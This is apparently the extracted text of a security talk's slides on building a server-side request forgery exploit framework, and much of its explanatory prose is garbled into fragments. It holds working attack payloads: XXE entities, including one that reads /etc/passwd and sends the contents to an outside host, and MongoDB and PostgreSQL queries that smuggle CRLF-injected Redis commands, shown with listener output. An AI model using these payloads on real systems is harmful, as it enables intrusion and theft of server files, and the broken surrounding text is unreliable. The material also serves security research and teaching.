Build Your SSRF Exploit Framework
 SSRF @ringzero KNOW IT • • • HACK IT SSRF SSRF SSRF • HOW SSRF • • • • • SSRF KNOW IT, SSRF? 
 
 
 
 Web Interface http://10.10.10.10:8080/manager/images/tomcat.gif KNOW IT SSRF Redis server HTTP server 80 & 8080 SSRF_Interface APP server SSRF ( FingerPrint ) • {Payload} • • • DOS( Keep-Alive Always ) users / dirs / files 
 
 
 
 
 
 
 SSRF Request MongoDB MemCache Redis-Server 
 …… • • 100% OpenSSL (Cookies & User:Pass) OpenSSL — TSL HELLO OpenSSL 
 SSL — Cookies, USER & PASS , ? WEB SERVER !!! 
 1024 DOS * KNOW IT, SSRF • SSRF • ( Upload from URL, Import & Export RSS feed) (Oracle MongoDB • • • Webmail MSSQL Postgres CouchDB) (POP3/IMAP/SMTP) (ffpmg, ImageMaic, DOCX, PDF XML ) -> • Upload from URL • • Discuz! Import & Export RSS feed • Web Blog XML • • Wordpress xmlrpc.php SSRF XML • XXE • DTD • XLST -- XML -> SSRF XSLT
 Template XML XSLT Processor
 (Saxon) Output
 Files XML Fuzz Cheatsheet ( ) • DTD Remote Access — 
 <!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd"> • XML External Entity — 
 <!ENTITY % file system "file:///etc/passwd" >
 <!ENTITY % d SYSTEM “http://wuyun.org/file?data=%file"> • URL Invocation — URL 
 <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" “http://wuyun.org/urlin">
 <roottag>test</roottag> • XML Encryption — XML 
 <xenc:AgreementMethod Algorithm= "http://wuyun.org/1">
 <xenc:EncryptionProperty Target= "http://wuyun.org/2">
 <xenc:CipherReference URI= "http://wuyun.org/3">
 <xenc:DataReference URI= “http://wuyun.org/4"> XML Fuzz Cheatsheet — Web Services • XML Signature — XML 
 <Reference URI=“http://wuyun.org/5"> • WS Policy — SOA WS 
 <To xmlns=“http://www.w3.org/2005/08/addressing">http://wuyun.org/to</To>
 <ReplyTo xmlns="http://www.w3.org/2005/08/addressing">
 <Address>http://wuyun.org/rto</Address>
 </ReplyTo> • WS Addressing — Web Services • From WS Security — JAVA WEB 
 <wsp:PolicyReference URI=“http://wuyun.org/pr"> 
 <input message="wooyun" wsa:Action="http://wuyun.org/ip" />
 <output message="wooyun" wsa:Action="http://wuyun.org/op" /> XML Fuzz Cheatsheet — • WS Federation — Web Services 
 <fed:Federation FederationID="http://wuyun.org/fid">
 <fed:FederationInclude>http://wuyun.org/inc</fed:FederationInclude>
 <fed:TokenIssuerName>http://wuyun.org/iss</fed:TokenIssuerName>
 <mex:MetadataReference>
 • XBRL — 
 <wsa:Address>http://wuyun.org/mex</wsa:Address>
 <xbrli:identifier scheme="http://wuyun.org/xbr">
 </mex:MetadataReference> <link:roleType roleURI=“http://wuyun.org/role"> • ODATA (edmx) 
 • <edmx:Reference URI="http://wuyun.org/edmxr">
 <edmx:AnnotationsReference URI="http://wuyun.org/edmxa"> STRATML — 
 <stratml:Source>http://wuyun.org/stml</stratml:Source> (MongoDB) -> SSRF • > db.copyDatabase('\r\nconfig set dbfilename wyssrf\r\nquit\r\n’,'test','10.6.4.166:6379') [root@10-6-4-166 ~]# nc -l -vv 6379
 Connection from 10.6.19.144 port 6379 [tcp/*]
 config set dbfilename wyssrf
 quit
 .system.namespaces 50000+ > db.copyDatabase(‘helo','test','10.6.4.166:22'); {"errmsg" : “……helo.systemnamespaces failed: " }
 
 > db.copyDatabase(‘helo','test','10.6.4.166:9999');
 {"errormsg" : "couldn't connect to server 10.6.4.166:9999"} MongoDB Server (Oracle) -> • UTL_HTTP • UTL_TCP • UTL_SMTP SSRF http://docs.oracle.com/cd/E11882_01/appdev.112/e40758/u_http.htm (PostgresSQL) -> SSRF • dblink_send_query() SELECT dblink_send_query( ‘host=127.0.0.1 dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n’ password=1 port=6379 sslmode=disable’, 'select version();’ ); 
 [root@localhost ~]# nc -l -vv 6379
 Connection from 127.0.0.1 port 6379 [tcp/*]
 config set dbfilename wyssrf
 quit
 
 https://www.postgresql.org/docs/8.4/static/dblink.html